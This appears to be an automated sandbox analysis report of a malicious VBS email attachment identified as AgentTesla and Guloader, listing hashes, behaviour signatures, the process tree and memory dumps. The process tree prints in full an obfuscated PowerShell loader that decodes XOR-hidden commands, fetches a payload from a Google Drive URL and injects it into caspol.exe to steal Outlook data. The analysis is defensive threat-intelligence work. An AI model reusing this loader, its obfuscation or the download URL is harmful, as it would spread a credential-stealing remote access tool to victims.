Analysis

  • max time kernel
    72s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    08-02-2023 18:41

General

  • Target

    Sipariş.28.vbs

  • Size

    125KB

  • MD5

    90f6cad58fa39455b2bd712eb9a9e5d4

  • SHA1

    72e110e777392aa23aba252deedbae00ce93d01a

  • SHA256

    88caf41122ae930ca97f30367279b2065148a9319224e34c132eab0cfad2561b

  • SHA512

    1cdb50e920c078ed39000b63cf70e0351795d5e7704b29c1905d0678dae5e721bfbf26b57ecf667990ab55c7076add780fffe2478b44bb5ddfb2f3f2d6b1f33a

  • SSDEEP

    1536:FFHXmJmnq3Cj74LIHCWF0KcBFuw4AZfsz/1U/727jPysWIJuHhgz26qZgFfga7oj:FYYq3Cj8LqE9ly7jPTWCuHiq0fga7oj

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=1-WQl_IuA-mYLU2KIuYz-IB-5GgJqjQQP

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 3 IoCs
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Sipariş.28.vbs"
    1⤵
    • Blocklisted process makes network request
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2032
    • C:\Windows\System32\cmd.exe
      cmd /c echo off
      2⤵
        PID:1500
      • C:\Windows\System32\cmd.exe
        cmd /c echo rshell
        2⤵
          PID:676
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reno = """Function Udvidend11 { param([String]`$Unintrusiv); `$Knyedesk = ''; Write-Host `$Knyedesk; Write-Host `$Knyedesk; Write-Host `$Knyedesk; `$crania = New-Object byte[] (`$Unintrusiv.Length / 2); For(`$Boli171=0; `$Boli171 -lt `$Unintrusiv.Length; `$Boli171+=2){ `$crania[`$Boli171/2] = [convert]::ToByte(`$Unintrusiv.Substring(`$Boli171, 2), 16); `$bourgsi = (`$crania[`$Boli171/2] -bxor 16); `$crania[`$Boli171/2] = `$bourgsi; } [String][System.Text.Encoding]::ASCII.GetString(`$crania);}`$Uprea0=Udvidend11 '43696364757D3E747C7C';`$Uprea1=Udvidend11 '5D7973627F637F76643E47797E23223E457E637176755E71647966755D7564787F7463';`$Uprea2=Udvidend11 '57756440627F7351747462756363';`$Uprea3=Udvidend11 '43696364757D3E42657E64797D753E597E6475627F6043756266797375633E58717E747C75427576';`$Uprea4=Udvidend11 '636462797E77';`$Uprea5=Udvidend11 '5775645D7F74657C7558717E747C75';`$Uprea6=Udvidend11 '42444360757379717C5E717D753C305879747552694379773C304065727C7973';`$Uprea7=Udvidend11 '42657E64797D753C305D717E71777574';`$Uprea8=Udvidend11 '4275767C757364757454757C7577716475';`$Uprea9=Udvidend11 '597E5D757D7F62695D7F74657C75';`$tabulator0=Udvidend11 '5D6954757C757771647544696075';`$tabulator1=Udvidend11 '537C7163633C304065727C79733C304375717C75743C30517E6379537C7163633C305165647F537C716363';`$tabulator2=Udvidend11 '597E667F7B75';`$tabulator3=Udvidend11 '4065727C79733C305879747552694379773C305E7567437C7F643C304679626465717C';`$tabulator4=Udvidend11 '4679626465717C517C7C7F73';`$tabulator5=Udvidend11 '7E64747C7C';`$tabulator6=Udvidend11 '5E6440627F647573644679626465717C5D757D7F6269';`$tabulator7=Udvidend11 '595548';`$tabulator8=Udvidend11 '4C';`$Elektrok=Udvidend11 '454355422322';`$Overnatni=Udvidend11 '53717C7C47797E747F6740627F7351';function fkp {Param (`$gaffs, `$Animalizes) ;`$Immerging0 =Udvidend11 '346062797E302D30384B516060547F7D71797E4D2A2A53656262757E64547F7D71797E3E577564516363757D727C7975633839306C3047787562753D5F727A757364306B30344F3E577C7F72717C516363757D727C695371737875303D517E7430344F3E5C7F737164797F7E3E43607C79643834647172657C71647F6228394B3D214D3E556165717C63383445606275712039306D393E57756444696075383445606275712139';.(`$tabulator7) `$Immerging0;`$Immerging5 = Udvidend11 '345E7F7E65607C7564302D30346062797E3E5775645D7564787F7438344560627571223C304B446960754B4D4D305038344560627571233C30344560627571243939';.(`$tabulator7) `$Immerging5;`$Immerging1 = Udvidend11 '62756465627E30345E7F7E65607C75643E597E667F7B7538347E657C7C3C3050384B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E58717E747C754275764D385E75673D5F727A7573643043696364757D3E42657E64797D753E597E6475627F6043756266797375633E58717E747C7542757638385E75673D5F727A75736430597E64406462393C3038346062797E3E5775645D7564787F74383445606275712539393E597E667F7B7538347E657C7C3C305038347771767663393939393C3034517E797D717C796A75633939';.(`$tabulator7) `$Immerging1;}function GDT {Param ([Parameter(Position = 0, Mandatory = `$True)] [Type[]] `$Linntwit,[Parameter(Position = 1)] [Type] `$Isthmus132 = [Void]);`$Immerging2 = Udvidend11 '345F7676757E647C797764302D304B516060547F7D71797E4D2A2A53656262757E64547F7D71797E3E547576797E7554697E717D7973516363757D727C6938385E75673D5F727A7573643043696364757D3E4275767C757364797F7E3E516363757D727C695E717D75383445606275712839393C304B43696364757D3E4275767C757364797F7E3E557D79643E516363757D727C695265797C7475625173737563634D2A2A42657E393E547576797E7554697E717D79735D7F74657C7538344560627571293C303476717C6375393E547576797E75446960753834647172657C71647F62203C3034647172657C71647F62213C304B43696364757D3E5D657C64797371636454757C75777164754D39';.(`$tabulator7) `$Immerging2;`$Immerging3 = Udvidend11 '345F7676757E647C7977643E547576797E75537F7E6364626573647F6238344560627571263C304B43696364757D3E4275767C757364797F7E3E53717C7C797E77537F7E66757E64797F7E634D2A2A4364717E747162743C30345C797E7E64677964393E437564597D607C757D757E647164797F7E567C717763383445606275712739';.(`$tabulator7) `$Immerging3;`$Immerging4 = Udvidend11 '345F7676757E647C7977643E547576797E755D7564787F743834647172657C71647F62223C3034647172657C71647F62233C3034596364787D65632123223C30345C797E7E64677964393E437564597D607C757D757E647164797F7E567C717763383445606275712739';.(`$tabulator7) `$Immerging4;`$Immerging5 = Udvidend11 '62756465627E30345F7676757E647C7977643E536275716475446960753839';.(`$tabulator7) `$Immerging5 ;}`$Struktura = Udvidend11 '7B75627E757C2322';`$Udvidend03 = Udvidend11 '577564537F7E637F7C7547797E747F67';`$Udvidend00=Udvidend11 '43787F6747797E747F67';`$Udvidend01 = Udvidend11 '34637B6671747475302D304B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A57756454757C7577716475567F6256657E7364797F7E407F797E6475623838767B603034557C757B64627F7B30344574667974757E742020393C30385754443050384B597E644064624D3C304B45597E6423224D3930384B597E644064624D393939';.(`$tabulator7) `$Udvidend01;`$Udvidend02 = Udvidend11 '345F667562607C757E302D304B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A57756454757C7577716475567F6256657E7364797F7E407F797E6475623838767B603034436462657B6465627130344574667974757E742023393C30385754443050384B597E644064624D3930384B597E644064624D393939';.(`$tabulator7) `$Udvidend02;`$Immerging7 = Udvidend11 '345D71627B717E647D7564302D30345F667562607C757E3E597E667F7B75382039';.(`$tabulator7) `$Immerging7;`$Immerging7 = Udvidend11 '34637B66717474753E597E667F7B7538345D71627B717E647D75643C302039';.(`$tabulator7) `$Immerging7;`$Immerging6 = Udvidend11 '34757E64717D7F75302D304B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A57756454757C7577716475567F6256657E7364797F7E407F797E6475623838767B603034436462657B646562713034647172657C71647F6224393C30385754443050384B597E644064624D3C304B45597E6423224D3C304B45597E6423224D3C304B45597E6423224D3930384B597E644064624D393939';.(`$tabulator7) `$Immerging6;`$Fuca = fkp `$tabulator5 `$tabulator6;`$Immerging7 = Udvidend11 '34637F7379717C7D75747923302D3034757E64717D7F753E597E667F7B75384B597E644064624D2A2A4A75627F3C302625223C302068232020203C302068242039';.(`$tabulator7) `$Immerging7;`$Immerging8 = Udvidend11 '34567562797562302D3034757E64717D7F753E597E667F7B75384B597E644064624D2A2A4A75627F3C3029212822202023223C302068232020203C3020682439';.(`$tabulator7) `$Immerging8;`$Udvidend01 = 'https://drive.google.com/uc?export=download&id=1-WQl_IuA-mYLU2KIuYz-IB-5GgJqjQQP';`$Udvidend00 = Udvidend11 '344364717463647A75212128302D30385E75673D5F727A757364305E75643E477572537C79757E64393E547F677E7C7F7174436462797E7738344574667974757E74202139';`$Immerging8 = Udvidend11 '34637F7379717C7D757479222D34757E662A71606074716471';.(`$tabulator7) `$Immerging8;`$socialmedi2=`$socialmedi2+'\Potentialn.dat';`$Stadstje118='';if (-not(Test-Path `$socialmedi2)) {while (`$Stadstje118 -eq '') {.(`$tabulator7) `$Udvidend00;Start-Sleep 5;}Set-Content `$socialmedi2 `$Stadstje118;}`$Stadstje118 = Get-Content `$socialmedi2;`$Immerging9 = Udvidend11 '34597D7D756277797E77302D304B43696364757D3E537F7E667562644D2A2A56627F7D527163752624436462797E7738344364717463647A7521212839';.(`$tabulator7) `$Immerging9;`$Stadstje1180 = Udvidend11 '4B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A537F60693834597D7D756277797E773C30203C303034637F7379717C7D757479233C3026252239';.(`$tabulator7) `$Stadstje1180;`$Udlednings=`$Immerging.count-652;`$Stadstje1181 = Udvidend11 '4B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A537F60693834597D7D756277797E773C302625223C30345675627975623C303445747C75747E797E776339';.(`$tabulator7) `$Stadstje1181;`$Stadstje1182 = Udvidend11 '344275737F7E7475222120302D304B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A57756454757C7577716475567F6256657E7364797F7E407F797E6475623838767B603034557C757B64627F7B30345F6675627E71647E79393C30385754443050384B597E644064624D3C304B597E644064624D3C304B597E644064624D3C304B597E644064624D3C304B597E644064624D3930384B597E644064624D393939';.(`$tabulator7) `$Stadstje1182;`$Stadstje1183 = Udvidend11 '344275737F7E74752221203E597E667F7B753834637F7379717C7D757479233C345675627975623C34566573713C203C2039';.(`$tabulator7) `$Stadstje1183#;""";Function Stadstje1189 { param([String]$Unintrusiv); For($Boli171=0; $Boli171 -lt $Unintrusiv.Length-1; $Boli171+=(0+1)){$Udvidend = $Udvidend + $Unintrusiv.Substring($Boli171, 1)}; $Udvidend;}$Caris0 = Stadstje1189 'IEX ';$Caris1= Stadstje1189 $Reno;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Caris1 ;}else{.$Caris0 $Caris1;}"
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:664
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Udvidend11 { param([String]$Unintrusiv); $Knyedesk = ''; Write-Host $Knyedesk; Write-Host $Knyedesk; Write-Host $Knyedesk; $crania = New-Object byte[] ($Unintrusiv.Length / 2); For($Boli171=0; $Boli171 -lt $Unintrusiv.Length; $Boli171+=2){ $crania[$Boli171/2] = [convert]::ToByte($Unintrusiv.Substring($Boli171, 2), 16); $bourgsi = ($crania[$Boli171/2] -bxor 16); $crania[$Boli171/2] = $bourgsi; } [String][System.Text.Encoding]::ASCII.GetString($crania);}$Uprea0=Udvidend11 '43696364757D3E747C7C';$Uprea1=Udvidend11 '5D7973627F637F76643E47797E23223E457E637176755E71647966755D7564787F7463';$Uprea2=Udvidend11 '57756440627F7351747462756363';$Uprea3=Udvidend11 '43696364757D3E42657E64797D753E597E6475627F6043756266797375633E58717E747C75427576';$Uprea4=Udvidend11 '636462797E77';$Uprea5=Udvidend11 '5775645D7F74657C7558717E747C75';$Uprea6=Udvidend11 '42444360757379717C5E717D753C305879747552694379773C304065727C7973';$Uprea7=Udvidend11 '42657E64797D753C305D717E71777574';$Uprea8=Udvidend11 '4275767C757364757454757C7577716475';$Uprea9=Udvidend11 '597E5D757D7F62695D7F74657C75';$tabulator0=Udvidend11 '5D6954757C757771647544696075';$tabulator1=Udvidend11 '537C7163633C304065727C79733C304375717C75743C30517E6379537C7163633C305165647F537C716363';$tabulator2=Udvidend11 '597E667F7B75';$tabulator3=Udvidend11 '4065727C79733C305879747552694379773C305E7567437C7F643C304679626465717C';$tabulator4=Udvidend11 '4679626465717C517C7C7F73';$tabulator5=Udvidend11 '7E64747C7C';$tabulator6=Udvidend11 '5E6440627F647573644679626465717C5D757D7F6269';$tabulator7=Udvidend11 '595548';$tabulator8=Udvidend11 '4C';$Elektrok=Udvidend11 '454355422322';$Overnatni=Udvidend11 '53717C7C47797E747F6740627F7351';function fkp {Param ($gaffs, $Animalizes) ;$Immerging0 =Udvidend11 '346062797E302D30384B516060547F7D71797E4D2A2A53656262757E64547F7D71797E3E577564516363757D727C7975633839306C3047787562753D5F727A757364306B30344F3E577C7F72717C516363757D727C695371737875303D517E7430344F3E5C7F737164797F7E3E43607C79643834647172657C71647F6228394B3D214D3E556165717C63383445606275712039306D393E57756444696075383445606275712139';.($tabulator7) $Immerging0;$Immerging5 = Udvidend11 '345E7F7E65607C7564302D30346062797E3E5775645D7564787F7438344560627571223C304B446960754B4D4D305038344560627571233C30344560627571243939';.($tabulator7) $Immerging5;$Immerging1 = Udvidend11 '62756465627E30345E7F7E65607C75643E597E667F7B7538347E657C7C3C3050384B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E58717E747C754275764D385E75673D5F727A7573643043696364757D3E42657E64797D753E597E6475627F6043756266797375633E58717E747C7542757638385E75673D5F727A75736430597E64406462393C3038346062797E3E5775645D7564787F74383445606275712539393E597E667F7B7538347E657C7C3C305038347771767663393939393C3034517E797D717C796A75633939';.($tabulator7) $Immerging1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Linntwit,[Parameter(Position = 1)] [Type] $Isthmus132 = [Void]);$Immerging2 = Udvidend11 '345F7676757E647C797764302D304B516060547F7D71797E4D2A2A53656262757E64547F7D71797E3E547576797E7554697E717D7973516363757D727C6938385E75673D5F727A7573643043696364757D3E4275767C757364797F7E3E516363757D727C695E717D75383445606275712839393C304B43696364757D3E4275767C757364797F7E3E557D79643E516363757D727C695265797C7475625173737563634D2A2A42657E393E547576797E7554697E717D79735D7F74657C7538344560627571293C303476717C6375393E547576797E75446960753834647172657C71647F62203C3034647172657C71647F62213C304B43696364757D3E5D657C64797371636454757C75777164754D39';.($tabulator7) $Immerging2;$Immerging3 = Udvidend11 '345F7676757E647C7977643E547576797E75537F7E6364626573647F6238344560627571263C304B43696364757D3E4275767C757364797F7E3E53717C7C797E77537F7E66757E64797F7E634D2A2A4364717E747162743C30345C797E7E64677964393E437564597D607C757D757E647164797F7E567C717763383445606275712739';.($tabulator7) $Immerging3;$Immerging4 = Udvidend11 '345F7676757E647C7977643E547576797E755D7564787F743834647172657C71647F62223C3034647172657C71647F62233C3034596364787D65632123223C30345C797E7E64677964393E437564597D607C757D757E647164797F7E567C717763383445606275712739';.($tabulator7) $Immerging4;$Immerging5 = Udvidend11 '62756465627E30345F7676757E647C7977643E536275716475446960753839';.($tabulator7) $Immerging5 ;}$Struktura = Udvidend11 '7B75627E757C2322';$Udvidend03 = Udvidend11 '577564537F7E637F7C7547797E747F67';$Udvidend00=Udvidend11 '43787F6747797E747F67';$Udvidend01 = Udvidend11 '34637B6671747475302D304B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A57756454757C7577716475567F6256657E7364797F7E407F797E6475623838767B603034557C757B64627F7B30344574667974757E742020393C30385754443050384B597E644064624D3C304B45597E6423224D3930384B597E644064624D393939';.($tabulator7) $Udvidend01;$Udvidend02 = Udvidend11 '345F667562607C757E302D304B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A57756454757C7577716475567F6256657E7364797F7E407F797E6475623838767B603034436462657B6465627130344574667974757E742023393C30385754443050384B597E644064624D3930384B597E644064624D393939';.($tabulator7) $Udvidend02;$Immerging7 = Udvidend11 '345D71627B717E647D7564302D30345F667562607C757E3E597E667F7B75382039';.($tabulator7) $Immerging7;$Immerging7 = Udvidend11 '34637B66717474753E597E667F7B7538345D71627B717E647D75643C302039';.($tabulator7) $Immerging7;$Immerging6 = Udvidend11 '34757E64717D7F75302D304B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A57756454757C7577716475567F6256657E7364797F7E407F797E6475623838767B603034436462657B646562713034647172657C71647F6224393C30385754443050384B597E644064624D3C304B45597E6423224D3C304B45597E6423224D3C304B45597E6423224D3930384B597E644064624D393939';.($tabulator7) $Immerging6;$Fuca = fkp $tabulator5 $tabulator6;$Immerging7 = Udvidend11 '34637F7379717C7D75747923302D3034757E64717D7F753E597E667F7B75384B597E644064624D2A2A4A75627F3C302625223C302068232020203C302068242039';.($tabulator7) $Immerging7;$Immerging8 = Udvidend11 '34567562797562302D3034757E64717D7F753E597E667F7B75384B597E644064624D2A2A4A75627F3C3029212822202023223C302068232020203C3020682439';.($tabulator7) $Immerging8;$Udvidend01 = 'https://drive.google.com/uc?export=download&id=1-WQl_IuA-mYLU2KIuYz-IB-5GgJqjQQP';$Udvidend00 = Udvidend11 '344364717463647A75212128302D30385E75673D5F727A757364305E75643E477572537C79757E64393E547F677E7C7F7174436462797E7738344574667974757E74202139';$Immerging8 = Udvidend11 '34637F7379717C7D757479222D34757E662A71606074716471';.($tabulator7) $Immerging8;$socialmedi2=$socialmedi2+'\Potentialn.dat';$Stadstje118='';if (-not(Test-Path $socialmedi2)) {while ($Stadstje118 -eq '') {.($tabulator7) $Udvidend00;Start-Sleep 5;}Set-Content $socialmedi2 $Stadstje118;}$Stadstje118 = Get-Content $socialmedi2;$Immerging9 = Udvidend11 '34597D7D756277797E77302D304B43696364757D3E537F7E667562644D2A2A56627F7D527163752624436462797E7738344364717463647A7521212839';.($tabulator7) $Immerging9;$Stadstje1180 = Udvidend11 '4B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A537F60693834597D7D756277797E773C30203C303034637F7379717C7D757479233C3026252239';.($tabulator7) $Stadstje1180;$Udlednings=$Immerging.count-652;$Stadstje1181 = Udvidend11 '4B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A537F60693834597D7D756277797E773C302625223C30345675627975623C303445747C75747E797E776339';.($tabulator7) $Stadstje1181;$Stadstje1182 = Udvidend11 '344275737F7E7475222120302D304B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A57756454757C7577716475567F6256657E7364797F7E407F797E6475623838767B603034557C757B64627F7B30345F6675627E71647E79393C30385754443050384B597E644064624D3C304B597E644064624D3C304B597E644064624D3C304B597E644064624D3C304B597E644064624D3930384B597E644064624D393939';.($tabulator7) $Stadstje1182;$Stadstje1183 = Udvidend11 '344275737F7E74752221203E597E667F7B753834637F7379717C7D757479233C345675627975623C34566573713C203C2039';.($tabulator7) $Stadstje1183#"
            3⤵
            • Blocklisted process makes network request
            • Checks QEMU agent file
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:832
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
              4⤵
              • Checks QEMU agent file
              • Accesses Microsoft Outlook profiles
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:1904

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
        Filesize

        61KB

        MD5

        fc4666cbca561e864e7fdf883a9e6661

        SHA1

        2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

        SHA256

        10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b

        SHA512

        c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        342B

        MD5

        ff3043d065f6491ea761c86b23f33e75

        SHA1

        75288f53a669ba1e0a19afca100214cba59bfed6

        SHA256

        ccdb39ab1778a0afb1775c3cb43289647c77bb2f581ddf29c8c6759a22fe9360

        SHA512

        0d73213a7cc187248bf3d9e172d146831028d383d92e477f49f14965192fd56ad040849474dab00ae713b3fb6b9cc1edd5d78a910a204457b29114fb2b4dd74d

      • memory/664-66-0x0000000002984000-0x0000000002987000-memory.dmp
        Filesize

        12KB

      • memory/664-96-0x000000000298B000-0x00000000029AA000-memory.dmp
        Filesize

        124KB

      • memory/664-57-0x0000000000000000-mapping.dmp
      • memory/664-59-0x000007FEF40D0000-0x000007FEF4AF3000-memory.dmp
        Filesize

        10.1MB

      • memory/664-61-0x0000000002984000-0x0000000002987000-memory.dmp
        Filesize

        12KB

      • memory/664-60-0x000007FEF3570000-0x000007FEF40CD000-memory.dmp
        Filesize

        11.4MB

      • memory/664-64-0x000000000298B000-0x00000000029AA000-memory.dmp
        Filesize

        124KB

      • memory/676-55-0x0000000000000000-mapping.dmp
      • memory/832-67-0x0000000073C10000-0x00000000741BB000-memory.dmp
        Filesize

        5.7MB

      • memory/832-74-0x0000000077DB0000-0x0000000077F30000-memory.dmp
        Filesize

        1.5MB

      • memory/832-63-0x00000000767B1000-0x00000000767B3000-memory.dmp
        Filesize

        8KB

      • memory/832-68-0x0000000005C60000-0x000000000B3F1000-memory.dmp
        Filesize

        87.6MB

      • memory/832-95-0x0000000077DB0000-0x0000000077F30000-memory.dmp
        Filesize

        1.5MB

      • memory/832-72-0x0000000077BD0000-0x0000000077D79000-memory.dmp
        Filesize

        1.7MB

      • memory/832-73-0x0000000077DB0000-0x0000000077F30000-memory.dmp
        Filesize

        1.5MB

      • memory/832-65-0x0000000073C10000-0x00000000741BB000-memory.dmp
        Filesize

        5.7MB

      • memory/832-62-0x0000000000000000-mapping.dmp
      • memory/832-76-0x0000000005C60000-0x000000000B3F1000-memory.dmp
        Filesize

        87.6MB

      • memory/832-94-0x0000000005C60000-0x000000000B3F1000-memory.dmp
        Filesize

        87.6MB

      • memory/832-92-0x0000000073C10000-0x00000000741BB000-memory.dmp
        Filesize

        5.7MB

      • memory/832-82-0x0000000077DB0000-0x0000000077F30000-memory.dmp
        Filesize

        1.5MB

      • memory/832-83-0x0000000077DB0000-0x0000000077F30000-memory.dmp
        Filesize

        1.5MB

      • memory/1500-54-0x0000000000000000-mapping.dmp
      • memory/1904-75-0x0000000000820000-0x0000000005FB1000-memory.dmp
        Filesize

        87.6MB

      • memory/1904-84-0x0000000000820000-0x0000000005FB1000-memory.dmp
        Filesize

        87.6MB

      • memory/1904-87-0x0000000000400000-0x0000000000615000-memory.dmp
        Filesize

        2.1MB

      • memory/1904-88-0x0000000000401000-0x0000000000615000-memory.dmp
        Filesize

        2.1MB

      • memory/1904-90-0x0000000000400000-0x0000000000430000-memory.dmp
        Filesize

        192KB

      • memory/1904-91-0x0000000077DB0000-0x0000000077F30000-memory.dmp
        Filesize

        1.5MB

      • memory/1904-81-0x0000000077DB0000-0x0000000077F30000-memory.dmp
        Filesize

        1.5MB

      • memory/1904-93-0x0000000077DB0000-0x0000000077F30000-memory.dmp
        Filesize

        1.5MB

      • memory/1904-79-0x0000000077BD0000-0x0000000077D79000-memory.dmp
        Filesize

        1.7MB

      • memory/1904-71-0x000000000081768E-mapping.dmp
      • memory/2032-56-0x000007FEFC451000-0x000007FEFC453000-memory.dmp
        Filesize

        8KB